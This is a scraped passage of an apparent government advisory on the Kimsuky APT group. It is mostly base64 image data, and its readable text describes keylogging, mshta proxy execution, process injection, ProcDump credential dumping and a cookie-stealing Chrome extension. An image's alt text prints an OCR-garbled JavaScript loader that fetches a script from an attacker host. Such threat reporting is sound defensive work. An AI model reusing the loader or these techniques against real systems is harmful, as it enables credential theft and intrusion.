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" style="width: 447px; height: 192px;" /></font></font></p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Figure 2: Disabled firewall values in the Registry</em> [<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">41</a>]</p> <ul> <li>Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (<em>Indicator Removal on Host: File Deletion </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1070/004/">T1070.004</a>]).[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">42</a>]</li> <li>Kimsuky has used <code>mshta.exe</code>, which is a utility that executes Microsoft HTAs. It can be used for proxy execution of malicious <code>.hta</code> files and JavaScript or VBS through a trusted windows utility (<em>Signed Binary Proxy Execution: Mshta</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1218/005">T1218.005</a>]). It can also be used to bypass application allow listing solutions (<em>Abuse Elevation Control Mechanism: Bypass User Access Control</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1548/002">T1548.002</a>]).[<a href="https://attack.mitre.org/groups/G0094/">43</a>],[<a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/">44</a>]</li> <li>Win7Elevate—which was noted above—is also used to evade traditional security measures. Win7Elevatve is a part of the Metasploit framework open-source code and is used to inject malicious code into explorer.exe (<em>Process Injection </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1055">T1055</a>]). The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim's temporary folder, and loads the file as a library.[<a href="https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities">45</a>],[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">46</a>],[<a href="https://attack.mitre.org/groups/G0094/">47</a>]</li> </ul> <h4 style="margin-top: 8px; margin-bottom: 8px;">Credential Access</h4> <p>Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (<em>Credential Access</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0006/">TA0006</a>]).<font color="#000000"> </font></p> <ul> <li>Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. Kimsuky uses <code>ProcDump</code>, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (<em>OS Credential Dumping</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/">T1003</a>]). <code>ProcDump</code> monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of <code>ProcDump</code> in the BabyShark malware.[<a href="https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/">48</a>]</li> <li>According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (<em>Man-in-the-Browser</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1185/">T1185</a>]).[<a href="https://attack.mitre.org/groups/G0094/">49</a>],[<a href="https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/">50</a>] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named <code>jQuery.js</code>, from a separate site (see figure 3).[<a href="https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/">51</a>]</li> </ul> <p align="center" style="text-align: center; margin-bottom: 8px;"><font color="#000000"><font face="Times New Roman"><img alt="Machine generated alternative text: var Jqmin — function() var , e createHttp(); if (null e) try &quot;https : / bizsonet.com/wp-admin/j s/jquery . j s&quot; , e. open ( &quot;get&quot; , &quot;applicationrx-www-forn-urlencoced&quot;), e. send() catch (e) return e.responseText return i function Var : if ( ! e) var document. get ElementsByTagName( &quot; s c ript &quot; ) ; t. length) (var a O; a t. length; a++) ttal.id (e 28) r document. createäement( &quot;script&quot;); &quot;text/ javascript&quot;, r. type r. id i, r.src &quot;https://&quot;•øx.bizsonet.cor/wp-adrin/js/jquery-3.3.I.rin.js&quot;, document . getE1ementsByTagName( &quot; head&quot; ) . appendChi1d (r) " data-entity-type="" data-entity-uuid="" src="https://us-cert.cisa.govdata:image/png;base64,/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAoHBwkHBgoJCAkLCwoMDxkQDw4ODx4WFxIZJCAmJSMgIyIoLTkwKCo2KyIjMkQyNjs9QEBAJjBGS0U+Sjk/QD3/2wBDAQsLCw8NDx0QEB09KSMpPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT3/wAARCAFwAeIDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrtA8M6M3gbRbhfDel3d1LY25YvaREsxRcsxI59T3rX/4RDQTd7P8AhGtGEATJc2ceS3oBio/Dl21l4D8PzEAwrp9v5nHIHlLjH41YbWrhdVS2KR7cAOu05yRnI56fhTSbKUG9iKz8I6FLEzXXhnRo2Lnaososhc8Z461Y/wCEN8Nf9C9pH/gFF/8AE1e02S6mg8278r5wGUICNo9DmqWoSiPWrXybiYzc77dX+UoFPO3645oSu7EtWE/4Q3w1/wBC9pH/AIBRf/E0f8Ib4a/6F7SP/AKL/wCJrPPiK+eGRrY2srDa2Nrfu8g5U+pGKtW2qtJfWP2yaBJZFkXy1yCTnqOenFW6bQE3/CG+Gv8AoXtI/wDAKL/4mj/hDPDX/QvaR/4BRf8AxNP0zULy4vDHdLEEeLzU2Agr82MHPX1qxc3d3FexRQ2ZkhbG6XdjbWcvd3Gk2VP+EN8Nf9C9pH/gFF/8TR/whvhr/oXtI/8AAKL/AOJrRv5J4rORrVUaQA4DkgVktqUuk6dH9pOZHhaQFnL7n6gZx+lNK41By2Jf+EN8Nf8AQvaR/wCAUX/xNH/CG+Gv+he0j/wCi/8AiaF1S8UySSRxtFtfYqg7gV9TVe5v7vbp9xHfWoheRllcIdh4OAefw+tNRGoMsf8ACG+Gv+he0j/wCi/+Jo/4Q3w1/wBC9pH/AIBRf/E0S6kLe7vissUkqRKyoM8DvkfrxUSavezQkQG3kKlv3wVtjgAHgZ98UcrDkZL/AMIb4a/6F7SP/AKL/wCJo/4Q3w1/0L2kf+AUX/xNTQSG61aTzWK7IFKR54Ibq39Kk0aRmtHQuZEjlZEcnJZQeP8AD8Kkgq/8Ib4a/wChe0j/AMAov/iaP+EM8Nf9C9pH/gFF/wDE1aBkk1shndEii